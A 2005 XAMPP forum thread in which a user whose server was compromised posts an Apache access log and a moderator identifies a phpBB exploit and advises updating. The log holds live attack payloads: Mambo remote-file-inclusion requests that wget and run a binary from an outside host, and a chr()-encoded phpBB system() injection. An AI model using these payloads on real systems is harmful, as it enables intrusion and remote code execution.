Hacked? Accessed cmd.exe, how to prevent?

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Hacked? Accessed cmd.exe, how to prevent?

Postby Zeno McDohl » 29. December 2005 02:35

Check this out.
Image

Someone mind telling me how someone is accessing my cmd.exe? Using Apache/2.0.49, how can I fix this?
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:06

Without an access.log from the same date/time as this message I can nothing say...
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany

Postby Zeno McDohl » 29. December 2005 03:12

Here are the logs from when it happened (today):
Code: Select all
24.34.111.159 - - [28/Dec/2005:00:34:21 -0500] "GET / HTTP/1.0" 200 476
66.7.255.244 - - [28/Dec/2005:01:06:22 -0500] "GET / HTTP/1.0" 200 476
193.255.32.38 - - [28/Dec/2005:03:26:22 -0500] "GET / HTTP/1.0" 200 476
207.46.98.138 - - [28/Dec/2005:04:37:00 -0500] "GET /robots.txt HTTP/1.0" 404 353
207.46.98.138 - - [28/Dec/2005:04:37:00 -0500] "GET / HTTP/1.0" 200 476
24.34.111.159 - - [28/Dec/2005:05:42:05 -0500] "GET / HTTP/1.0" 200 476
222.135.177.74 - - [28/Dec/2005:05:41:53 -0500] "GET / HTTP/1.0" 200 476
66.249.65.177 - - [28/Dec/2005:06:09:18 -0500] "GET /robots.txt HTTP/1.1" 404 353
66.249.65.177 - - [28/Dec/2005:06:09:18 -0500] "GET /chub/ HTTP/1.1" 200 4681
71.113.167.59 - - [28/Dec/2005:06:50:07 -0500] "GET / HTTP/1.0" 200 476
66.194.6.76 - - [28/Dec/2005:07:22:19 -0500] "GET / HTTP/1.1" 200 476
211.175.175.247 - - [28/Dec/2005:08:42:54 -0500] "GET / HTTP/1.0" 200 476
65.202.73.207 - - [28/Dec/2005:10:38:36 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 349
65.202.73.207 - - [28/Dec/2005:10:38:37 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 348
65.202.73.207 - - [28/Dec/2005:10:38:38 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 355
65.202.73.207 - - [28/Dec/2005:10:38:39 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 353
65.202.73.207 - - [28/Dec/2005:10:38:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
65.202.73.207 - - [28/Dec/2005:10:38:41 -0500] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
222.96.156.160 - - [28/Dec/2005:10:46:18 -0500] "GET http://www.abcseek.info/cgi-bin/ip1.cgi HTTP/1.0" 404 356
220.213.210.206 - - [28/Dec/2005:12:36:03 -0500] "GET / HTTP/1.0" 200 476
80.228.221.140 - - [28/Dec/2005:14:44:14 -0500] "GET /videos/ HTTP/1.1" 404 350
80.228.221.140 - - [28/Dec/2005:14:44:14 -0500] "GET /favicon.ico HTTP/1.1" 200 1406
68.142.251.133 - - [28/Dec/2005:15:11:40 -0500] "GET /robots.txt HTTP/1.0" 404 353
68.142.250.174 - - [28/Dec/2005:15:11:41 -0500] "GET /contact.html HTTP/1.0" 200 436
200.23.35.52 - - [28/Dec/2005:15:18:23 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 349
200.23.35.52 - - [28/Dec/2005:15:18:24 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 348
200.23.35.52 - - [28/Dec/2005:15:18:25 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 355
200.23.35.52 - - [28/Dec/2005:15:18:26 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 353
200.23.35.52 - - [28/Dec/2005:15:18:28 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
200.23.35.52 - - [28/Dec/2005:15:18:29 -0500] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
218.216.224.15 - - [28/Dec/2005:15:42:37 -0500] "GET / HTTP/1.0" 200 476
66.249.64.52 - - [28/Dec/2005:17:16:58 -0500] "GET /robots.txt HTTP/1.0" 404 353
66.249.64.52 - - [28/Dec/2005:17:16:59 -0500] "GET / HTTP/1.0" 200 476
207.46.98.138 - - [28/Dec/2005:17:39:22 -0500] "GET /robots.txt HTTP/1.0" 404 353
207.46.98.138 - - [28/Dec/2005:17:39:22 -0500] "GET / HTTP/1.0" 200 476
70.24.242.151 - - [28/Dec/2005:18:32:35 -0500] "GET / HTTP/1.0" 200 476
83.103.197.78 - - [28/Dec/2005:20:26:23 -0500] "GET /phpBB2 HTTP/1.1" 301 386
83.103.197.78 - - [28/Dec/2005:20:26:24 -0500] "GET /phpBB2/ HTTP/1.1" 200 21332
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_faq.gif HTTP/1.1" 200 219
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_search.gif HTTP/1.1" 200 237
83.103.197.78 - - [28/Dec/2005:20:26:28 -0500] "GET /phpBB2/templates/subSilver/images/logo_phpBB.gif HTTP/1.1" 200 7973
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_members.gif HTTP/1.1" 200 223
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_groups.gif HTTP/1.1" 200 222
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.1" 200 354
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_register.gif HTTP/1.1" 200 224
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_profile.gif HTTP/1.1" 200 236
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_message.gif HTTP/1.1" 200 232
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_login.gif HTTP/1.1" 200 233
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_latest_reply.gif HTTP/1.1" 200 135
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/folder_locked_big.gif HTTP/1.1" 200 673
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/cellpic1.gif HTTP/1.1" 200 246
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/cellpic3.gif HTTP/1.1" 200 257
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/cellpic2.jpg HTTP/1.1" 200 480
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/folder_big.gif HTTP/1.1" 200 677
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/whosonline.gif HTTP/1.1" 200 929
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/folder_new_big.gif HTTP/1.1" 200 663
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/lang_english/reply-locked.gif HTTP/1.1" 200 1515
83.103.197.78 - - [28/Dec/2005:20:26:36 -0500] "GET /phpBB2/viewforum.php?f=1&sid=d7cff77e2fda81bab6bd7ed130db9e3f HTTP/1.1" 200 26339
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/folder.gif HTTP/1.1" 200 344
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/folder_new.gif HTTP/1.1" 200 336
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_announce.gif HTTP/1.1" 200 307
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_new_hot.gif HTTP/1.1" 200 1159
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_hot.gif HTTP/1.1" 200 1178
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_sticky.gif HTTP/1.1" 200 344
83.103.197.78 - - [28/Dec/2005:20:26:39 -0500] "GET /phpBB2/templates/subSilver/images/folder_lock_new.gif HTTP/1.1" 200 459
83.103.197.78 - - [28/Dec/2005:20:26:39 -0500] "GET /phpBB2/templates/subSilver/images/folder_lock.gif HTTP/1.1" 200 333
83.103.197.78 - - [28/Dec/2005:20:26:42 -0500] "GET /phpBB2//viewtopic.php?t=15&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(119)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 32790
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET / HTTP/1.1" 200 476
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /main.html HTTP/1.1" 200 345
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /top.html HTTP/1.1" 200 982
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /zenobanner.gif HTTP/1.1" 200 32383
127.0.0.1 - - [28/Dec/2005:20:35:23 -0500] "GET /Darkff.mid HTTP/1.1" 200 7412
127.0.0.1 - - [28/Dec/2005:20:35:23 -0500] "GET /favicon.ico HTTP/1.1" 200 1406
127.0.0.1 - - [28/Dec/2005:20:35:29 -0500] "GET /start/ HTTP/1.1" 404 340
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:19

And wich entry has the same time/date as the firewall message?
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany

Postby Zeno McDohl » 29. December 2005 03:21

Happened around 8:26pm, so... all of those 20:26 times.
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:35

83.103.197.78 - - [28/Dec/2005:20:26:42 -0500] "GET /phpBB2//viewtopic.php?t=15&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(119)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 32790

I think this is an exploit for the phpBB forum software. You should update the software and/or ask the phpBB support.
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 110 guests